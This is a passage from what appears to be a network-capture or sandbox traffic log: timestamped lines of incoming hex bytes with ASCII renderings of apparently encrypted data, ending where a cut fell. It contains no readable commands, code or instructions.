1b 36 7e 96 3b 78 80 d7 db 2a 10 bc 5f dc 81 1e ca 95 b7 0e df ac 05 f7 7b be 3f 45 76 b8 ac 4f e9 ef 97 7e Data Ascii: gun9(VKkTwTXQQagP -RrNk.TY&p@+\@tF(f\|?wp~IQ.Qd"Chl4_qW?(<4!~_LUKomJdJ?_<`m6~;x*_{?EvO~
2023-08-02 08:35:15 UTC	1409	IN	Data Raw: f6 45 2c 82 6c 95 60 da f1 e6 40 ae 5d 3b 13 be 85 5c f1 96 ab 91 33 16 fa d7 7f 94 c0 8e 41 5b 49 68 73 80 54 81 01 b9 da 9f ca 6e e3 10 f7 99 6c 81 7c 52 5a cc ed 67 d4 d9 3a a7 43 24 39 b8 64 11 89 0c d4 f6 b7 70 a7 8f 51 30 9c 1d 63 1b 78 18 dc da b7 f9 34 21 43 e4 cb 5a 59 b4 99 8c da 41 ec 5d ae ef 10 93 0b eb 5d 37 8e 93 09 40 20 5d 34 46 3c f6 34 e3 68 05 44 78 05 fd b9 aa 7f 5b 2a e7 67 8f a1 3a 64 15 9d 60 a6 09 34 c9 65 e8 47 a0 f2 18 67 2c 43 ea 60 e9 69 27 5c 13 48 5c 02 80 a6 c5 d3 f2 9f 47 fa 8a 20 f3 6d 36 7a 49 49 27 50 c6 e1 ae a9 17 4b 53 fd 9b e4 78 4d 08 b8 fc 18 81 0d 90 9f 59 ca c4 03 48 5b f6 6f c7 54 20 91 98 9f cf 38 bf 3a ce b3 6c 7a f1 d3 c0 c6 59 c4 19 4f c2 55 2d be f1 6a 15 6c 59 34 e1 5d 0a 42 53 21 79 b0 f4 cc 10 1f 21 7e Data Ascii: E,l`@];\3A[IhsTnl\|RZg:C$9dpQ0cx4!CZYA]]7@ ]4F<4hDx[*g:d`4eGg,C`i'\H\G m6zII'PKSxMYH[oT 8:lzYOU-jlY4]BS!y!~
2023-08-02 08:35:15 UTC	1425	IN	Data Raw: 99 9c 81 16 c4 91 f3 28 eb cd 33 8f 1c 53 69 11 68 3b b6 3f 40 17 d8 12 de 98 bb f3 3e a8 3b a9 14 aa 77 fc a0 bb 3f 38 de d6 9f 88 b1 9e 3b b3 92 bc 49 a6 2f 59 97 9c bc 7f 12 91 4d 9d 2d d4 ec 8c 2a 37 32 2b 90 99 c6 02 02 de 0d 92 75 8f be f8 60 0c 0b 4a 9b 60 7d 0a aa be 7f 40 75 6c f8 74 68 25 3e 01 11 96 3c 22 1c 92 99 c9 77 7f c8 e6 93 cc 9f 63 b1 42 da 04 fa 1b f4 78 6e a1 78 d7 dd 0d b5 96 6c 22 c7 57 45 28 06 18 68 80 58 3a 2b b3 27 ed 9e 55 13 1b 81 f1 d5 6b 88 1f 61 8e 95 0b db d1 a2 ac d7 c7 36 6f 2b 5b 7b f2 03 4b 12 d5 57 43 d0 c2 01 da c1 46 b2 8e 60 a0 c9 86 19 96 3e 3e c8 22 b3 cd 72 56 3b f6 85 08 bb 56 ea 9a 09 09 25 3b bb 38 e2 61 84 0c de a7 b5 8a be 02 e7 a9 bf db c6 84 7e c8 e2 f8 42 18 ae fb f7 16 51 e7 d7 f3 17 1e ef f2 84 76 31 Data Ascii: (3Sih;?@>;w?8;I/YM-*72+u`J`}@ulth%><"wcBxnxl"WE(hX:+'Uka6o+[{KWCF`>>"rV;V%;8a~BQv1
2023-08-02 08:35:15 UTC	1441	IN	Data Raw: 74 ec cf 7f 50 2f 7b ea 5e f9 22 02 58 85 21 a6 b5 d3 f9 2c 82 c5 43 74 24 d8 84 d3 85 d2 91 4b 35 02 cd 7e 5b 55 e2 ef a7 00 37 57 9b 3c 93 04 62 01 93 f8 55 b0 4f eb 0f 42 87 e3 7a 19 02 15 c4 ac 3d 84 8c 13 20 b4 7d 1a a8 84 68 0c 5a f4 31 e0 c7 27 2c cc 1b 03 40 05 c8 70 32 0d 73 f8 2e b5 8f de 1e 2b 58 7f b5 fe 2a 8f 44 de 13 c0 63 8e 49 c2 82 ef 82 f9 d2 cd 75 4e 96 14 3b d8 6b a5 2c 40 ff f0 1f 20 4a 2e c1 7a 0c 14 26 e8 de 8e 0a b3 96 a0 35 6f 5f 86 90 bc 81 43 3b 72 bd 40 0c b9 3e fe 66 95 9c 8b b7 84 bf 81 2f c4 a9 c2 e9 20 a1 e7 ac 64 11 ce 61 25 30 03 89 67 2b 8d a8 53 df de 86 b9 97 02 65 aa ae 2b 9e b7 c3 af 3e 78 6b 9b 92 bc 22 13 8d 55 05 c1 17 1c cb 2f 45 a2 64 6c a2 dd 29 98 4d a7 79 66 ae 96 e0 8a 9e d5 a2 a3 07 cc 21 65 97 71 75 e1 3e Data Ascii: tP/{^"X!,Ct$K5~[U7W<bUOBz= }hZ1',@p2s.+X*DcIuN;k,@ J.z&5o_C;r@>f/ da%0g+Se+>xk"U/Edl)Myf!equ>
2023-08-02 08:35:15 UTC	1457	IN	Data Raw: db 18 38 47 16 46 b3 8b ac e7 64 24 3a 9f 64 1e 01 35 c5 f7 28 50 9e 30 db 7a 67 ed 35 a4 95 06 25 ea b7 34 0c c2 bd c0 b0 ed 83 1d 34 25 d9 03 5f 5a 3a ee 52 51 2d c6 26 56 da 0f cb 58 6e c6 af 70 00 93 c2 cc ff d7 3e 78 94 07 e2 08 d3 31 b1 85 bb c5 dc 12 0b 5e ce 18 f9 db d8 12 08 ad ca d6 08 ed bd 30 2f 66 0d 31 a2 da 75 58 3f cb 18 fc ab e7 9b 12 1f a7 de 60 b1 a5 77 6f 4c 94 98 a4 b4 d6 fc 60 ef b5 97 18 2f 7e cb 31 6e 7d 0e 61 85 05 e8 05 df b2 6c 2d 51 f6 7d 6e 56 e0 d2 1a ce 0a 06 72 71 13 01 a1 c8 4a 34 11 f5 94 a7 b4 54 37 93 5a 24 66 b8 38 d9 e4 08 54 07 60 07 80 85 30 91 99 a1 94 d2 13 20 19 11 35 9c 0e ad 4f 8a ea 39 ba e1 f9 0c cb 82 0b 95 30 f8 38 2d 92 e4 f8 82 7c 46 91 29 03 d1 f8 33 a7 92 e4 b7 ca 4e 0c 1c 62 7a 50 25 14 51 10 4e c7 c1 Data Ascii: 8GFd$:d5(P0zg5%44%_Z:RQ-&VXnp>x1^0/f1uX?`woL`/~1n}al-Q}nVrqJ4T7Z$f8T`0 5O908-\|F)3NbzP%QN
2023-08-02 08:35:15 UTC	1473	IN	Data Raw: fb 5d 84 a5 3c 10 e6 63 db d4 28 3f 90 50 15 f3 85 ec 9b 16 c2 8a a9 2b b8 a7 b1 ea e0 0d 26 c7 e0 06 88 ef 6b 21 a0 dc 57 95 71 74 75 1c 0e c1 e0 ea 28 ec 63 72 f0 7f 00 09 51 65 82 f2 da b6 70 19 7f 05 87 3e c7 f5 9a 6f ea da d8 4e eb 93 fa 38 3a ca 4a 83 57 b0 9e c1 14 6c d9 e5 52 30 fa dc e7 86 c5 17 bc 02 70 e1 53 f0 42 32 cd c5 39 88 20 41 49 ad f4 41 79 10 ce 40 da f1 9f 92 ff 0c cf 83 3a 7a 03 26 97 b1 86 58 6e 40 2e 6c 8a 22 ec 95 c9 d6 99 84 2f 3d 56 10 6e b2 95 ca 5e c7 a0 b0 46 b8 a8 9f 24 61 df d8 08 5c 96 95 83 82 d0 74 2e d0 87 5c e7 59 d0 db 8f c8 08 2b fb 65 5f cb 31 bf 0c 9a 5a a4 87 0d 1f b3 cb 80 f3 4e 27 26 a5 22 fc ce fd 0d a0 0c bb e7 3a a4 05 08 6a 3b b6 58 dc 54 d5 30 a9 49 52 46 80 6e f5 db ad 4d 0e 29 d1 42 db 54 ad e1 51 e7 fe Data Ascii: ]<c(?P+&k!Wqtu(crQep>oN8:JWlR0pSB29 AIAy@:z&Xn@.l"/=Vn^F$a\t.\Y+e_1ZN'&":j;XT0IRFnM)BTQ
2023-08-02 08:35:15 UTC	1489	IN	Data Raw: a7 7e 5e 3d c3 96 f5 e9 23 6a 5d 8d 41 44 45 01 b7 52 b8 2f e6 b3 16 62 2d 9d d4 38 25 61 f4 17 8a 26 68 de 2a 99 b9 67 de e6 4f e7 ee e4 c2 b1 f8 1d 47 c4 a1 c2 de 62 1d 63 44 57 aa a0 90 38 10 1c fb 92 e6 8c f8 9e d2 92 1a 1f 6c ad 5c 83 94 50 2d df 41 e9 3e 2e d7 d9 74 17 8e 44 5b 7e 63 70 89 f1 2d 8a e4 bc 3c 5a 67 10 0e 3d 70 7d b9 5d 98 b2 22 e2 5c b7 88 13 ea af e4 69 24 c0 23 af 60 0a ba bd 9f 3b 7a d5 0c 14 f1 e2 ac c9 f6 37 73 c2 a5 75 d0 36 ff ab 4d 21 fa 91 1c 27 df 37 b7 f6 4f 45 7e 74 98 ee 18 d7 27 f4 8e 77 2c 30 af 14 45 7c 7f 25 e5 3c 5d e2 9e ce 7b 7d f2 7a 92 0a e9 ae d5 17 e6 b2 b0 70 42 c4 ab 19 39 83 af e0 9d c7 43 2d c8 4f 1f 14 63 22 30 95 00 e9 fc 98 d3 fd 01 2e b3 c1 5b ab 0c 19 d0 ac 92 7b be 26 3b 83 f7 ed 92 13 25 0d 4c d8 ba Data Ascii: ~^=#j]ADER/b-8%a&h*gOGbcDW8l\P-A>.tD[~cp-<Zg=p}]"\i$#`;z7su6M!'7OE~t'w,0E\|%<]{}zpB9C-Oc"0.[{&;%L
2023-08-02 08:35:15 UTC	1505	IN	Data Raw: de ba f6 9c 6e b7 44 68 61 71 15 58 e2 78 95 8e 4e 5a 07 10 08 1e e6 42 eb 9a 8e f2 f5 2c d1 43 3e b0 07 a8 89 fd 01 8e 46 a8 76 ca ab fd b6 ee b5 4a 17 f5 ad c4 98 d1 d9 bc 2b 52 6b 48 8f f0 50 27 a1 6e 77 14 e3 f1 30 68 07 41 0b 7c 12 75 20 ec 6a 17 b7 ff 17 64 13 fd fd 7f 1f cb 2c b8 81 25 9a 62 d0 d6 b6 90 63 3c 0e 1b 01 99 b5 82 7d 55 49 b7 62 a6 6d f6 2e 52 6d 3b 14 03 dc 7d 1f d4 cb 41 a4 4e 1e f0 55 97 18 01 48 f3 b9 7b 14 73 c8 ee ed 70 43 87 c5 cc a6 9d 92 a1 96 dd 50 e9 4a 2b db 1f 0c 6d 8c 2d e5 de 2e e7 34 dc e7 ae 75 2b c5 44 51 49 17 1d 5b 29 5e 0e 33 82 75 86 43 71 b9 76 46 59 7e 05 54 4a 74 69 ba 0a 96 70 82 93 41 8f 29 b1 61 65 96 4c 99 3c e5 9d 69 48 bc e3 15 63 cb 57 3d 5b 9e de 64 5f c9 c0 d5 50 c7 2b ef 88 49 08 a4 6c b0 54 04 a1 61 Data Ascii: nDhaqXxNZB,C>FvJ+RkHP'nw0hA\|u jd,%bc<}UIbm.Rm;}ANUH{spCPJ+m-.4u+DQI[)^3uCqvFY~TJtipA)aeL<iHcW=[d_P+IlTa
2023-08-02 08:35:15 UTC	1521	IN	Data Raw: 59 b2 c8 c0 54 43 1c 54 b8 5a b9 34 e9 ab 89 6c c2 54 57 19 a0 a7 8b 71 43 bc a9 94 4c 25 cc 0b 6d a7 d0 65 9c a7 32 f3 20 af a6 0d 01 0d c8 bd fe 1d cd 8a 2c 81 6c 21 0a 8d 9f 79 e1 5c 53 56 4e c0 3a 46 ed fd 71 46 e8 32 7d ad aa 34 31 7d 9a 1a 8d d5 b4 5c 16 79 4c 8b a0 28 ea a3 d8 f6 45 aa d7 fe ef c0 d3 d3 a0 c6 07 4f 1d e0 15 47 7b 47 61 60 da 8b 55 ae f1 8c 5c 69 79 72 de d4 4d 22 5d 43 8d 41 20 5c cf bd 09 f1 1e 22 be e0 5d e9 db b6 90 25 08 2f cf 38 21 c0 19 d3 bf 9b 96 f0 1d e6 94 79 28 c3 92 af 19 fe 48 15 18 e7 75 50 9d cf a8 5b d5 37 a5 5f 78 d7 51 0f 54 00 70 21 d9 aa 92 95 1f ba 22 a0 4f 46 4f 68 e9 83 1a 5f 5f 5f 29 87 2e 02 3a 81 fb 61 24 3f db aa 82 4f 7c 1c e3 54 ab ba 88 b1 67 0c 7c f1 6b 14 07 b3 a8 67 19 d0 54 ef 90 a1 ca fc 96 5e 5a Data Ascii: YTCTZ4lTWqCL%me2 ,l!y\SVN:FqF2}41}\yL(EOG{Ga`U\iyrM"]CA \"]%/8!y(HuP[7_xQTp!"OFOh___).:a$?O\|Tg\|kgT^Z
2023-08-02 08:35:15 UTC	1537	IN	Data Raw: 6e 8d 18 bf bf 92 f9 83 6d b8 96 33 d9 60 f0 13 c1 01 05 cf c0 de f2 32 cc 29 92 57 85 b8 93 e9 cc be 0b 4c ae ac 26 f7 5f 98 ba db 8c 17 b9 10 9e 7f 1f b1 16 a7 7c 84 62 ea 62 6b e2 d7 1a cb 78 84 af f0 76 46 72 97 82 8c 2e 33 40 4d 1e ec 00 28 aa 58 cb 88 c5 bf b3 24 57 1b 9e 60 ea 35 5c f8 75 fd db 7d 8b 84 90 56 61 92 dd 1e 6e 37 92 7e 94 d5 3a a4 3c 68 5a 41 ce 16 6b 5c 5f 47 c7 48 02 cc 9d c0 86 81 23 e2 6e 43 d3 d7 9d 66 8b 31 d6 e5 51 ac 4a b6 3c 60 69 0c 94 a2 ae 7f 70 a3 76 b8 f4 31 2b 39 6e 59 6c 44 22 b6 52 02 a5 69 f4 81 0a e1 64 70 2b c9 a2 79 4b 38 2e 37 90 5b 4e 86 d9 69 c3 fa 76 14 90 71 bf 6a fd 3d 77 08 3d 3a 9b 87 9c 39 0d 4a 10 92 e2 e7 0d b8 dc dc 54 46 18 12 1b 51 20 f5 8e 62 20 4a a6 89 97 f6 fc b5 7a 33 bd d6 a1 15 8a 74 f8 c3 e0 Data Ascii: nm3`2)WL&_\|bbkxvFr.3@M(X$W`5\u}Van7~:<hZAk\_GH#nCf1QJ<`ipv1+9nYlD"Ridp+yK8.7[Nivqj=w=:9JTFQ b Jz3t
2023-08-02 08:35:15 UTC	1553	IN	Data Raw: 33 9d 6f e1 ae 95 51 a8 2c a5 e3 e3 9b 1b 7d b0 d1 a6 cb 90 7c 03 53 99 15 2a fb 0d 14 2c ca 89 07 d2 4d 23 e2 61 7c 43 e7 58 1f 99 0e 1f 36 20 15 e9 f4 c8 ef f1 9f 86 28 fe 12 82 93 3e a5 1f 6e c9 85 45 fd da 79 50 de 3d 72 f8 0c bd 25 d1 73 62 a2 d7 b9 41 aa 94 b3 97 1f 2b a2 6d c0 9d bf 28 9a 0c f5 f7 82 ac dd b0 3c bb 15 ae 27 32 5b 88 6d 9c 19 21 a4 76 4e e2 42 17 d9 f6 2f 10 df ab 30 0e 70 11 ab ab 05 6d 87 85 99 df 89 c3 1a a9 25 54 08 8e 0f c6 4d 96 88 79 a0 58 48 d1 f4 3d b7 9e 71 56 ae 3d d2 0d d7 64 a3 00 38 6d de ff 0f 04 09 fd 10 de 0b c1 2e 0b da cc 11 51 41 4e 0b da e5 ce 54 cb 8f 54 10 1b 16 b8 36 c1 7a b5 dd bc 01 da 24 42 b9 75 10 74 12 23 47 46 e0 e3 71 49 48 ee 2b 40 15 02 77 2d f8 bf 4d 1a ce cc 33 3f 84 8a c8 ad 90 e6 a7 2c ee 04 a1 Data Ascii: 3oQ,}\|S*,M#a\|CX6 (>nEyP=r%sbA+m(<'2[m!vNB/0pm%TMyXH=qV=d8m.QANTT6z$But#GFqIH+@w-M3?,
2023-08-02 08:35:15 UTC	1569	IN	Data Raw: b5 f8 30 21 e5 c4 ae f5 8a 20 7d e2 79 19 3a e8 82 41 4b d5 bc 22 28 db 4b 1c 46 6c 1a 3b f0 91 e6 e1 30 ac bc f8 58 b4 e0 a6 d1 d7 3b 07 da 8b 31 64 5f 11 ac 9d 3e f4 cb fc a9 60 a6 a1 75 dd f5 4e 38 30 ed e7 8e 2e 8e 57 3e 11 3b f6 96 d0 fb da fc dd ba ca 27 e2 3a 98 be 7a 9d e8 f7 db b0 27 8d 55 7a c0 37 e9 2b 66 4e fd b2 4c 2f 59 17 f3 03 bd 94 05 d7 67 30 fc df 40 12 e4 aa f3 58 41 e0 ad 7f 41 f5 f4 22 9b cd a9 aa 36 b3 04 1b 32 3d 66 8d d6 49 3d 4e a9 f5 9a c1 be 26 be e8 f3 56 c5 81 1f d2 b2 96 45 01 56 55 d6 11 14 e1 72 d5 10 ef 39 d2 44 fd 10 cd 85 54 97 6f d3 31 2f b9 33 ce 0c 2b e8 46 68 14 46 b3 64 64 a2 36 e4 55 b6 00 c7 ea 72 60 5f 63 29 ba 58 0b b2 9a e4 cc 85 74 8b d4 c6 dd c2 d9 eb 81 be f9 d1 7a d0 8a fa 4a 1c 74 00 4a 53 f5 d3 f0 3a aa Data Ascii: 0! }y:AK"(KFl;0X;1d_>`uN80.W>;':z'Uz7+fNL/Yg0@XAA"62=fI=N&VEVUr9DTo1/3+FhFdd6Ur`_c)XtzJtJS:
2023-08-02 08:35:15 UTC	1585	IN	Data Raw: 1e 45 7b 0f b7 2f 14 15 61 d5 1e a9 13 2b be 8c 1a 87 c7 c7 6c 10 33 57 71 a3 3c 9c 92 90 41 cf ab 23 81 b1 2b bc 1e e8 6c 22 31 31 23 4d f2 75 dc 75 9b fd 6c 53 12 93 b6 40 0c eb 7f 7e 5f 9c e7 da 80 84 e5 8d 97 43 b8 32 96 20 75 db a2 72 28 29 a7 a3 d1 ca 81 61 38 d0 60 27 26 02 cc b2 e7 24 7a 8c a8 0c 7b 66 38 09 a2 80 ec f8 e4 13 ba d8 08 ad 80 c7 e9 86 d3 ee ed cf b8 af 62 6c 2a 37 de 38 3c 98 78 51 23 96 e6 93 df 14 50 e1 7d 32 4d 3e 5e a7 66 6b 3d 9b be 5f c2 6f 0c f0 64 37 e4 4f 68 9f 62 74 dc 95 ad 19 f3 42 da 35 ef 85 db 05 c2 c8 12 f0 e0 39 64 73 a5 bb 41 95 6b ce 9a ae 4b 72 65 32 38 fb ce 3a 91 c0 67 01 30 97 c7 35 5d 89 04 11 56 37 c8 95 30 23 42 8e 2d 1a 96 84 78 93 a2 50 3f fb 85 6f 6f 9f 4a 5c bd 31 90 3a ee cc e1 68 1c 5d b0 ab 65 da 5c Data Ascii: E{/a+l3Wq<A#+l"11#MuulS@~_C2 ur()a8`'&$z{f8bl*78<xQ#P}2M>^fk=_od7OhbtB59dsAkKre28:g05]V70#B-xP?ooJ\1:h]e\
2023-08-02 08:35:15 UTC	1601	IN	Data Raw: 05 9c f0 5e cb 9f 62 e7 8d bd b1 5b 4c d9 51 9c ac 48 54 27 b0 e1 9e 28 5f db 11 f8 aa 01 8c b8 a2 6d bc be 5d 41 d2 1d 6e 1e b8 fb b6 86 2b 3e f5 41 06 f4 8a 92 fe 27 50 bd 59 24 7b f2 14 a8 50 32 b4 1f 39 25 d7 9c 65 00 91 30 2f a2 7a 0c 98 4c 7f 05 43 11 b0 14 31 26 b9 7c 6e 2a 33 e9 c3 cb 31 91 8e b3 d0 29 9d 58 60 75 f3 76 0b 9f ac e1 99 5d b9 d7 fd 40 1f cf cd 4f 60 5e c9 34 e6 02 a5 03 a4 b0 30 9d 18 d0 25 b1 0a 62 88 d4 f0 a9 c5 6f da db 74 16 e6 3f 9f 02 7b 68 77 39 f5 b1 97 d3 c3 8f 40 de 07 ae c1 01 d6 fe 22 9b b3 db 5e 56 72 4f d1 7e d0 18 9b 34 cb 17 a1 8e 02 9a 0e d3 54 e1 50 ab e3 d5 11 b8 b8 29 91 e6 ac c3 e3 eb f2 22 25 ae fb 29 b7 e4 c5 0c 05 1f 98 49 03 4a ae ed 3f 9f a9 eb 67 7a d3 04 9f 2e e7 ac ec fa fc 90 10 27 53 31 57 e9 7e 91 ac Data Ascii: ^b[LQHT'(_m]An+>A'PY${P29%e0/zLC1&\|n*31)X`uv]@O`^40%bot?{hw9@"^VrO~4TP)"%)IJ?gz.'S1W~
2023-08-02 08:35:15 UTC	1617	IN	Data Raw: f4 11 5f 5d 3d f0 2a aa 0d b3 59 98 01 dc 08 24 c4 8b 73 08 fe f9 42 83 85 fc 81 bc 70 9b 1f 87 c8 1b aa af 96 2e cc e1 9f 07 2d a0 14 02 50 86 d7 53 c1 5a 04 c9 56 e8 cb 9f f2 cc 5b d1 dc 29 4e 09 94 cf cf 62 9f be f5 12 1f fb 4e 05 2e 71 b0 06 8d 0c e8 a2 53 fc 4c 73 1f 3d 5b 23 b5 ca 39 d8 4b 7e 49 3f 47 7c 38 4f 44 13 f9 c7 56 c8 c1 37 18 07 ce 77 b7 a7 06 47 99 c6 1c 6c dc 2a 2b 1e 62 2d f6 2b b7 bd d8 df d9 f4 a2 de d7 df e0 5f aa d9 10 3b 72 5a 44 06 4f 99 c0 85 46 f5 e8 19 bb 2d 64 50 67 f9 43 22 8d 30 d2 85 ea a5 13 39 6e 16 6c 35 5c 5e c3 d0 26 b8 3a d2 2d f5 c4 25 00 c3 50 af 55 c0 9c 21 9c be 0a d9 1a b4 36 40 d2 3e f8 a1 c8 ce e3 84 f5 d6 0e b5 54 28 ef 7e 27 52 9c 9e a9 86 74 5b 36 35 70 13 0c 72 a0 27 72 a9 75 de c4 be 81 35 ca d5 dc 19 c0 Data Ascii: _]=Y$sBp.-PSZV[)NbN.qSLs=[#9K~I?G\|8ODV7wGl+b-+_;rZDOF-dPgC"09nl5\^&:-%PU!6@>T(~'Rt[65pr'ru5
2023-08-02 08:35:15 UTC	1633	IN	Data Raw: ea 06 15 2a 76 9b b6 d9 7c 9a f3 5d 0d d7 54 a1 56 e8 ad 61 c6 1e 7c 8b 83 b8 50 56 c1 55 68 cf c1 aa 88 79 b6 c0 84 fc 5e db e9 ec 55 a5 c0 20 24 b1 6d 07 a6 68 dc 5d 40 66 c2 86 f5 34 17 68 c1 3a 7e a4 e5 f1 c1 8f 8f 93 ba 4a f3 62 63 7b 26 3f 48 f1 9e a5 6a ac 77 bc 7f 57 28 9b 92 89 ea 5e d8 f3 73 e2 03 bb ed de 80 35 ee aa 1b fd 42 6e 4a 0d 42 61 27 e1 fd 33 4f 72 65 3c 5e 5b 4f 40 46 82 9d 37 dc e5 4b ed a3 e3 6a 0c 69 10 01 ff ba f6 34 8c bc a6 bf 92 0c af a3 78 ab 97 20 7a 9c 00 70 e0 c0 28 f6 d1 e9 e8 e9 8a 4b 3e 90 8f 88 72 fd 45 8d a2 c7 94 b0 42 e6 46 c2 67 5d d8 cd 40 f7 61 14 af a2 f0 98 8b 9d 39 d3 cc a5 bb 9d 6c e7 2a 99 0f 5b ec 78 6a 2f 66 64 b1 ee 56 87 49 03 82 24 5a 51 89 05 a5 cd 8a e7 ac 89 17 44 e7 b7 a1 90 fa 32 d8 80 2c c0 c3 88 Data Ascii: v\|]TVa\|PVUhy^U $mh]@f4h:~Jbc{&?HjwW(^s5BnJBa'3Ore<^[O@F7Kji4x zp(K>rEBFg]@a9l[xj/fdVI$ZQD2,
2023-08-02 08:35:15 UTC	1649	IN	Data Raw: 52 c9 45 a4 fd 9c 8c 7e de be 1c 4e 1c ee ad d4 8e 30 38 ca a8 b9 7b af e6 2a 72 8a 17 2b b6 f3 06 f4 97 de 95 fc 60 54 64 72 cf 68 6f e0 85 c8 28 68 e8 d2 55 0b 34 16 15 6e ed fd f1 ad 03 ee de 97 c4 a7 17 70 16 b7 8c fa eb 64 11 59 f9 1b fa a8 5a d7 6c b2 4f d9 6c 0d 94 49 b3 20 0d ef 84 13 43 ac 69 99 96 06 ee ea 0f 38 35 06 9d 83 b3 e4 f0 2f 7c af 2d 77 ed 31 8a a4 14 ba de 09 f6 10 8c 11 1e c7 f9 0b 3f 3f ce ff 64 4b 51 e0 8d ce c9 6f 60 31 4d c9 13 92 b8 24 15 88 04 c2 26 ca 4f b0 f0 fb 4b ab ff 47 c5 86 c9 c3 f3 77 a1 75 ae bb 6d fe 74 f8 db 65 66 f1 6a 0e b0 a6 2d 2a 5f df ac 82 ab 3b 87 b4 85 c2 a5 a5 18 71 72 05 5a fa d4 09 bd 0b 8c e0 a9 ad 73 28 23 31 df 72 e8 e1 79 3f e4 bf cf aa 88 84 22 89 21 3e 20 75 ad 7c 54 98 6e e6 aa 8a 42 3a 8b 3c 33 Data Ascii: RE~N08{r+`Tdrho(hU4npdYZlOlI Ci85/\|-w1??dKQo`1M$&OKGwumtefj-_;qrZs(#1ry?"!> u\|TnB:<3
2023-08-02 08:35:15 UTC	1665	IN	Data Raw: 74 c4 3c b7 c1 dc 25 82 18 66 3e 01 bc b4 bb cc 60 08 dd 1f 7b 9e 87 17 7c fa 39 8f 44 2c 88 b9 ac 96 21 00 58 0c d6 40 5f 9f bf 6f 9c d2 1e e0 84 6f ff b1 49 c9 7b 60 da 04 08 f1 bb 71 ff 9d 87 80 0d 1d 3b 7a 9a 4c 95 91 16 75 58 8c a5 9d 99 d4 2e 67 f7 31 68 50 56 49 cc 11 ed 46 8b 21 d9 ef bd 26 f2 51 ef e5 05 c4 6e aa 14 6b 9a ff 57 bc a6 90 9b 3c ed 9c 2f 4b 6a c2 ad 70 a8 91 b5 17 d8 51 1d 2d 7d 9b e4 12 f1 bd 16 95 34 fc 25 cc 4c 58 a1 c4 e6 0a ea c2 47 ef 3d 31 8e 11 90 f8 5b 0d b5 42 b0 ef 8b 2b 19 e7 1d 53 0a 25 c4 4b 24 90 0e c1 3d 67 3f 4f 71 94 63 53 d2 13 cb 54 3b 1c 60 91 54 f6 1b de 9d 23 14 3d ca 55 70 5f 05 76 cc 9b 35 e2 1b 48 57 dd 07 79 1a bb c4 ac 19 3a d5 52 e2 ee 15 e8 c9 6d 75 e3 f7 0a ea fc fa 7b 1d 04 a3 ea 67 3b cf f5 f0 71 1b Data Ascii: t<%f>`{\|9D,!X@_ooI{`q;zLuX.g1hPVIF!&QnkW</KjpQ-}4%LXG=1[B+S%K$=g?OqcST;`T#=Up_v5HWy:Rmu{g;q
2023-08-02 08:35:15 UTC	1681	IN	Data Raw: f5 fc 41 20 e6 8a f4 ae 47 43 07 02 cc 88 d5 9a d1 49 a8 e8 8a fb 33 eb 08 43 01 8a 09 8f 8d b0 16 48 69 17 7a bb 04 6e 92 90 92 8a 22 94 15 d1 59 0f 21 a9 5d 4b 8b fa 0e b3 33 f9 19 4f 75 7b f5 d6 fb dd bc 9b 1a 3f 94 50 c4 e7 c5 15 99 75 b0 6e f6 39 69 df f8 53 8c 10 cb 59 8e 4c 15 6a af 44 b0 c7 2f da 45 10 96 f1 5f 9c ef af c5 a9 1a a3 df 04 6b 49 71 d2 f6 7b c8 a8 41 61 2b a7 f8 ec ee 52 11 00 5d ed 04 73 4c 9a 04 52 8e 2e 50 11 d0 3f 07 73 80 72 ae e5 b8 88 81 30 49 4e 6c 40 95 16 90 82 cb b8 1f 7a 0d 4c 38 ee df 6b b4 7b fc 7e a4 f2 e6 cd 8c 2e b1 84 89 2b 01 5f 97 f5 9d cb e3 57 0d 01 88 9a 57 8d 3d 7c aa 5c 13 0d 05 54 aa a6 c6 a7 42 08 1f 8a b0 8c 63 4a 62 96 b7 14 64 18 63 cb 4e 42 c6 ca 3b 68 54 b2 8d 12 69 08 27 46 35 90 ec be 99 2b f8 ec 0a Data Ascii: A GCI3CHizn"Y!]K3Ou{?Pun9iSYLjD/E_kIq{Aa+R]sLR.P?sr0INl@zL8k{~.+_WW=\|\TBcJbdcNB;hTi'F5+
2023-08-02 08:35:15 UTC	1697	IN	Data Raw: 4a f1 c2 b5 01 e6 81 6f 9f 88 16 c9 a0 26 d8 29 0e 2a 89 b7 64 d0 0e 19 88 f0 0b 7f 34 0d 16 a0 ea 57 e3 ad 5e bd 1e 72 83 d3 57 25 78 3f 49 10 1d 10 67 86 32 1b 24 e2 6c 02 05 e6 72 83 5e 19 23 ab 64 c0 cf c1 8c 85 38 9f 25 80 27 db 7b 97 87 38 fb f9 7c 73 8c 43 a3 78 53 e7 80 52 e7 c7 a9 a2 2d db 0a 4e e1 56 b5 d0 80 4b dd 7b f0 e2 39 af 1b a1 d8 c0 5d bc bc 33 4f 06 c1 a0 41 69 3a 87 19 af de bb ce c3 63 82 a8 dd a5 33 ac 45 ed 38 0d f4 b2 7e 65 66 a2 98 6e d1 0a da 35 51 8b 0d 91 e1 ac 85 8c d4 e3 ad 9a 23 15 b2 1d 76 c9 26 4c dc 65 b0 c5 47 6c ea fd 18 82 da d4 4c 4b 9b 29 ed b9 dc 97 15 ed ce 75 c0 b8 6c 5a 8b b8 f8 5b 81 5a 7c c2 01 e1 66 9a 07 a5 65 31 ca 1b 89 83 dd 7a 63 35 7b 32 47 93 8f 88 dd b0 e2 10 61 b1 e1 c1 4f cf 37 9b c9 c5 21 63 e9 f0 Data Ascii: Jo&)*d4W^rW%x?Ig2$lr^#d8%'{8\|sCxSR-NVK{9]3OAi:c3E8~efn5Q#v&LeGlLK)ulZ[Z\|fe1zc5{2GaO7!c
2023-08-02 08:35:15 UTC	1713	IN	Data Raw: 10 95 c3 2d a6 16 f4 44 4c 98 92 76 fd 20 a2 87 52 3e 68 e6 61 0a 3e 13 c9 97 26 12 73 c0 9a 94 4e 40 66 93 1b 37 43 06 7a 7a 09 7c 42 ad 25 64 49 a6 83 3d 6f d8 5f bb 85 3c 06 63 b3 c4 9b ea 52 cf 04 22 42 d6 0c b2 49 5c 4d b9 d5 15 f8 e0 44 e8 c0 ed d9 ba 65 a7 2e 46 9e b0 0b 87 7b 7e 4b b0 af 1d 11 d0 e4 60 a0 c0 f1 09 1f c0 71 6c 1f 82 21 6f eb 56 2b d6 9a 4e 1d eb 2c 76 0d 8e 0c 88 92 30 dd 57 c5 4f df d8 6e 93 b0 f3 23 b6 ee 09 86 81 cb c3 e9 b8 6a fb df 9b 58 b5 96 95 56 ff 61 e0 12 9e f3 f6 85 ee a1 c6 61 a8 2f 69 76 01 8c 0e 3f c7 cc 0e 20 1d c0 e4 cc 71 46 a9 e7 5c 60 ba 52 fc 83 93 6c 8f 